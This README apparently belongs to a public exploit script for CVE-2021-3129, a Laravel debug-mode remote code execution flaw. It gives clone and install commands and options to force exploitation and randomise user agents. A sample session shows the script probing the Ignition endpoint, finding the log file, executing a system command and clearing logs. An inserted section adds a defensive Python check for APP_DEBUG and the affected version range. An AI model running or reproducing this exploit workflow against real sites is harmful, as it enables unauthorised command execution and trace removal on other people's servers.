CVE-2021-3129 - Laravel RCE
About
This script exploits the Laravel RCE vulnerability (CVE-2021-3129).
It allows you to write or execute commands on a website running Laravel <= v8.4.2 that has "APP_DEBUG" set to "true" in its ".env" file.
It currently supports searching for the log file, executing commands, writing to the log file, and clearing log files.
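Added example, not part of the original script or README: a Python check a site owner can run over a project directory to test the two conditions named above (APP_DEBUG in ".env", Laravel <= v8.4.2). The function names, the lookup of laravel/framework in composer.lock, and the sample project are assumptions of this example.

```python
import json
import tempfile
from pathlib import Path

LAST_AFFECTED = (8, 4, 2)  # bound stated in this README: Laravel <= v8.4.2
OFF_VALUES = {"", "false", "(false)", "0", "null", "(null)", "empty", "(empty)"}

def debug_enabled(env_text):
    """True if any APP_DEBUG line is not explicitly off (assumption: err towards flagging)."""
    for line in env_text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key.strip() == "APP_DEBUG":  # a commented-out "#APP_DEBUG" does not match
            value = value.split(" #")[0].strip().strip("\"'").lower()
            if value not in OFF_VALUES:
                return True
    return False

def parse_version(raw):
    """'v8.4.2' -> (8, 4, 2); None for non-numeric tags such as 'dev-master'."""
    try:
        return tuple(int(p) for p in raw.lstrip("v").split(".")[:3])
    except ValueError:
        return None

def audit(project_dir):
    """Return findings for one Laravel project directory (empty list = none)."""
    root, findings = Path(project_dir), []
    env_file, lock_file = root / ".env", root / "composer.lock"
    if env_file.is_file() and debug_enabled(env_file.read_text()):
        findings.append("APP_DEBUG enabled in .env")
    packages = json.loads(lock_file.read_text()).get("packages", []) if lock_file.is_file() else []
    for pkg in (p for p in packages if p.get("name") == "laravel/framework"):
        version = parse_version(pkg.get("version", ""))
        if version is None:
            findings.append("laravel/framework version unreadable, check manually")
        elif version <= LAST_AFFECTED:
            findings.append("laravel/framework " + pkg["version"] + " in affected range")
    return findings

def build_sample(env_text, framework_version):
    """Write a constructed project (sample data, not a real site) to a temp dir."""
    root = Path(tempfile.mkdtemp())
    lock = {"packages": [{"name": "laravel/framework", "version": framework_version}]}
    (root / ".env").write_text(env_text)
    (root / "composer.lock").write_text(json.dumps(lock))
    return root

if __name__ == "__main__":
    print(audit(build_sample("APP_ENV=local\nAPP_DEBUG=true\n", "v7.22.4")))
```

Both findings together match the conditions this README gives for an affected site; either one alone is still worth fixing on a production host.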
Setup
$ git clone https://github.com/joshuavanderpoll/CVE-2021-3129.git
$ cd CVE-2021-3129
# pip install -r requirements.txt
# python3 CVE-2021-3129.py --help
Options
usage: CVE-2021-3129.py [-h] [--host HOST] [--force] [--log LOG] [--ua]
                        [--chain CHAIN] [--chains]

Exploit CVE-2021-3129 - Laravel vulnerability exploit script

optional arguments:
  -h, --help     show this help message and exit
  --host HOST    Host URL to use exploit on
  --force        Force exploit without checking if vulnerable
  --log LOG      Full path to laravel.log file (e.g.
                 /var/www/html/storage/logs/laravel.log)
  --ua           Randomize User-Agent for requests
  --chain CHAIN  Select PHPGGC chain. Use "--chains" parameter to view all
                 available chains.
  --chains       View available chains for the "--chain" parameter
Example
$ python3 CVE-2021-3129.py --host http://127.0.0.1/public/
Laravel Debug Mode CVE script
[•] Made by: https://jvdpoll.nl
[@] Starting exploit on "http://127.0.0.1/public/"...
[@] Testing vulnerable URL http://127.0.0.1/public/_ignition/execute-solution...
[√] Host seems vulnerable!
[@] Searching Laravel log file path...
[•] Log path found: "/home/laravel/web/storage/logs/laravel.log"
[•] Laravel log found: "/home/laravel/web/storage/logs/laravel.log".
[•] Laravel version found: "7.22.4".
[√] Laravel log file set to "/home/laravel/web/storage/logs/laravel.log".
[•] Use "?" for a list of all possible actions.
[?] Please enter a command to execute: help
[•] Available commands:
exit - Exit program.
help - Shows available commands.
clear_logs - Clears Laravel logs.
execute <command> - Execute system command.
write <command> - Write to log file.
[?] Please enter a command to execute: execute ls /home/laravel/web/
[@] Executing command "ls /home/laravel/web/"...
[@] Generating payload...
[√] Generated payload.
[@] Clearing logs...
[√] Cleared logs.
[@] Causing error in logs...
[√] Caused error in logs.
[@] Sending payload...
[√] Sent payload.
[@] Converting payload...
[√] Converted payload.
[√] Result:
README.md
app
artisan
bootstrap
composer.json
composer.lock
config
database
package.json
phpunit.xml
public
resources
routes
server.php
storage
tests
vendor
webpack.mix.js
[@] Clearing logs...
[√] Cleared logs.
Future:
- Automatically determine the PHPGGC chain if a version is detected while scanning.